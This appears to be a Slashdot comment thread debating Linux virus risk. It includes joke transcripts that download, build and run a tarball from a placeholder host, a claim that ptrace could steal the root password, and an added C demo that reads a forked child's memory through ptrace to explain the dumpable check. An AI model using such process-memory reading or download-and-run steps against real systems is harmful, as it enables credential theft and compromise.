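    The "owner" line is arivanov's developer case: anything the user compiled and installed is fair game for a virus running as that user, which is exactly why the binaries under /usr/bin need to stay root-owned and 0755. On a real system run infectable_executables("/", os.getuid(), set(os.getgroups())) and expect an empty list outside your own home directory.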
  19. Re:How to get infected using Linux... by QuantumG · · Score: 5

    hehe.. more like:

    calvin:~$ wget http://somesite/pointlessgadget.tgz
    calvin:~$ tar -xzvf pointlessgadget.tgz
    calvin:~$ cd pointlessgadget
    calvin:~$ ./configure
    calvin:~$ make
    calvin:~$ ./pointlessgadget

    "that was boring.. I'm gunna go shoot stuff"

    calvin:~$ su
    calvin:~$ /usr/leet/leetgame

    pointlessgadget was infected with a virus.. when you ran the virus it infected every one of your running processes, including your shell. You su'd to root and it peeked at your pseudoterminal to snarf the root password. It then su'd to root and infected every running process on the machine. You then ran leetgame and the virus infected it. Next you'll probably run 'ls' and then it's all over.

    Fiction? You can do it using ptrace. You can read about it here.

    --
    How we know is more important than what we know.
  20. Re:Viruses will come...Free Software isn't ready! by QuantumG · · Score: 5

    Sticking your head in the sand is no way to defend against "a plague of viruses". Writing viruses is the only way to actively discover how it is possible to defend against them. A lot of Linux viruses have already been written by very smart people and most have a scanner written for them too. Every virus developed introduces new information that can be added to a "generic scanner". Open and intelligent discussion of virus techniques is the solution to computer viruses.. on all platforms.. but the corporate antivirus companies don't want you to know that. They want you to subscribe to Virus Bulletin (a $5000/year subscription) and join the international computer antivirus standards body CARO (to join CARO you must be unanimously voted into CARO by current members. All current members are antivirus companies (or their founders) and have an interest in not voting you in - less competition). Don't let the anti-virus scam continue onto the Linux platform. Do some research, address the problems. The most revealing Linux virus research can be found at:

    http://www.big.net.au/~silvio/

    --
    How we know is more important than what we know.
  21. Don't run as root. by ronfar · · Score: 5
    Read Rick Moen's comments on this subject, and also this one: http://linuxmafia.com/~rick/faq/#virus Basically, the best security against evil binaries (which of course run into the sub-goblins of viruses, worms, Trojan Horses, and the like) is to not run as root.

    Of course, the biggest problem is that sometimes you are going to want to run as root, and you are probably going to want to install something while su'd to root. (It is wishful thinking to expect this not to happen. Someday there is going to be a really cool game for download in binary form that has a pop-up window which says "enter root password" which may then turn out to be a trojan.)

    My experience with virus checkers is that they don't work. I had a trojan eat an old Win95 machine of mine once, and the fact that it was running Norton's Anti-virus didn't help. However, Linux has more built in security against malicious actions than Win* systems, so I'm not expecting to see "a plague of Linux viruses."

    --
    All the creatures will die, And all the things will be broken. That's the law of samurai. (Jubai, 1605)
  22. How to get infected using Linux... by ralmeida · · Score: 5

    calvin:~$ wget http://somesite/happy99.tar.gz
    calvin:~$ tar zxf happy99.tar.gz
    calvin:~$ cd happy99
    calvin:~$ ./configure
    calvin:~$ make
    calvin:~$ su
    calvin:~$ make install
    calvin:~$ exit
    calvin:~$ happy99
    You must be root to run this program
    calvin:~$ su
    calvin:~$ happy99
    (ops!)

    --
    This space left intentionally blank.
    1. Re:How to get infected using Linux... by rcw-home · · Score: 5

      You can't ptrace setuid processes, and if you ptrace the parent bash process, you don't get the keystrokes from the su process.
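
      The boundary rcw-home is pointing at is the kernel's ptrace access check. On Linux, executing a setuid or setgid binary such as su clears the process's "dumpable" flag, and PTRACE_ATTACH to a non-dumpable process is refused with EPERM unless the tracer holds CAP_SYS_PTRACE, which is why a virus running as your user cannot attach to su and peek at the password it reads from the terminal. The following added example (written for this page, not code posted by QuantumG or rcw-home) reproduces both halves of the argument: a parent forks a child that holds a constructed `secret_word` in memory standing in for a password buffer, and tries to attach and read it with PTRACE_PEEKDATA. With the child left dumpable the read succeeds; with the child made non-dumpable via prctl(PR_SET_DUMPABLE, 0) (the same state a setuid exec produces) the attach is refused for an unprivileged tracer. It assumes Linux with glibc; the function and variable names are this example's own.

```c
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed "secret": a word the child keeps in memory, standing in for a
 * password buffer. The child is a fork (no exec), so it lives at the same
 * address in both processes and the parent can name it for PEEKDATA. */
static long secret_word = 0x5EC2E7;

/* Fork a child parked in pause(). If nondumpable is non-zero the child first
 * clears its dumpable flag, the state the kernel puts a process in when it
 * execs a setuid/setgid binary such as su. The parent then tries
 * PTRACE_ATTACH and, if that works, reads secret_word with PTRACE_PEEKDATA.
 * Returns 0 and stores the word in *out on success, else the errno ptrace
 * reported (EPERM when the kernel's access check refuses the attach). */
int try_read_child_word(int nondumpable, long *out)
{
    int ready[2];
    if (pipe(ready) != 0)
        return errno;

    pid_t pid = fork();
    if (pid < 0)
        return errno;

    if (pid == 0) {
        /* child: optionally become non-dumpable, then report readiness */
        close(ready[0]);
        if (nondumpable)
            prctl(PR_SET_DUMPABLE, 0, 0, 0, 0);
        char c = 'r';
        if (write(ready[1], &c, 1) != 1)
            _exit(1);
        close(ready[1]);
        for (;;)
            pause();
    }

    /* parent: wait until the child has finished its setup */
    close(ready[1]);
    char c;
    ssize_t n = read(ready[0], &c, 1);
    close(ready[0]);
    if (n != 1) {
        kill(pid, SIGKILL);
        waitpid(pid, NULL, 0);
        return EIO;
    }

    int rc = 0;
    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1) {
        rc = errno;                       /* kernel refused the attach */
    } else {
        int status;
        if (waitpid(pid, &status, 0) == pid && WIFSTOPPED(status)) {
            errno = 0;                    /* PEEKDATA returns the word itself */
            long w = ptrace(PTRACE_PEEKDATA, pid, (void *)&secret_word, NULL);
            if (w == -1 && errno != 0)
                rc = errno;
            else
                *out = w;
        } else {
            rc = ECHILD;
        }
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
    }

    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
    return rc;
}

/* Single-value wrappers: the errno of the attempt, and the word read (-1 on refusal). */
int attach_errno(int nondumpable)
{
    long w = 0;
    return try_read_child_word(nondumpable, &w);
}

long peeked_word(int nondumpable)
{
    long w = 0;
    return try_read_child_word(nondumpable, &w) == 0 ? w : -1;
}

int main(void)
{
    long w = 0;
    int r = try_read_child_word(0, &w);
    if (r == 0)
        printf("dumpable child:     attach ok, read 0x%lx from its memory\n", w);
    else
        printf("dumpable child:     attach refused (%s)\n", strerror(r));

    r = try_read_child_word(1, &w);
    if (r == 0)
        printf("non-dumpable child: attach ok (tracer has CAP_SYS_PTRACE)\n");
    else
        printf("non-dumpable child: attach refused (%s)\n", strerror(r));
    return 0;
}
```

      Build with `cc -o ptrace_demo ptrace_demo.c` and run it as an ordinary user: the first case reads the word, the second is refused. Run as root, the second case succeeds as well, because CAP_SYS_PTRACE overrides the dumpable check; that is the mechanical reason behind the "don't run as root" advice in the thread. Modern kernels with the Yama LSM add a further `ptrace_scope` restriction, but the parent-child relationship used here is still permitted at the common default of 1.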

  23. Viruses will come...Free Software isn't ready! by nullity · · Score: 5

    Most Linux users have no traditional Unix sysadmin, or user experience behind them. Traditionally the difficulty alone of installing Linux served as a sort of filter against immoral users engineering viruses. If you've ever administered a real system, or know of people who do, you're very unlikely to write a virus (unless you really have issues!).

    I suspect that a rash of Linux viruses will come not from an economic depression (though that could certainly cause it too...think Russia), but from the midst of the masses migrating to Linux. While virtually everyone installing Linux, from "script kiddies" to Windows NT converts, is scrupulous...you are bound to get a higher percentage of people who would be willing to write a virus.

    Now granted, more of these people are incapable of programming such an entity compared with old Unix hands...but where there's a will there's a way. Somebody is bound to kludge together (or even finely tune, you never know) a series of downloaded hacks (hey! free source code!), and write a little code of their own...voila! Microwave virus. And it only takes one good virus to cause serious issues. Particularly because these things almost always encourage copy-cat crime. Odds are we'll see a rash of viruses any time now - whether the economy is strong or not.

    Want to believe that even without a high "activation energy" (i.e. the work and knowledge to install Linux) the pool of users will remain "clean"? One only has to look at Amateur Radio for a counter-example. For a long time proficiency with Morse Code was required to obtain a license. Now this may not seem like much of a barrier...but it was. When the "No-Code" license was introduced a wave of new radio operators began coming on the air. Now I don't dispute the overall effects of the new license, I think most agree they were good overall. No sense keeping a good thing to an "elite" group of people. But there was one strong negative effect - the introduction of a few, er, less than choice individuals.

    Did such individuals exist in the "old world"? Well, yes. But they were a much lower percentage. Now radio had to deal with irritating interruptions and people refusing to follow protocol. A small loss, but many repeaters (stations that retransmit a weak signal) were unprepared and were abused as a result. Protection mechanisms were instituted, but it often took some months, during which time a repeater was far less useful.

    The long and short is that a company like Symantec (Norton) might find it worthwhile to have a Linux offering prepared. No use deploying it (well, not with scruples at least - I'm sure some morons will bite) until viruses exist. But when they do come, and I bet they will, that company will have a big lead. Other companies would probably take several months to a year to produce one. By that time one could really corner the market. Linux users win, some lucky company wins (hopefully whoever wrote the #*$&#*$&* virus shrivels up and dies). Yay!

    I think few of us familiar with the sort of hacks we deploy on our systems, the sort of tricks a *nix system can perform...would deny the feasibility of writing a virus. To do so would be...naive. Now that I think of it, though I realize acting before the fact isn't the strength of the free software community, it would probably be good to begin working on a feasible free program soon. Hope we never would have to use it...but... It would be bad, bad, BAD for Linux systems to be crippled for 5 months, admins cowering in fear, because of a rash of viruses. That would take major PR recovery...and Linux really isn't that strong. Remember, the media likes biting those it adored mere months ago. Makes for good news.

    -nullity-

    I am nothing.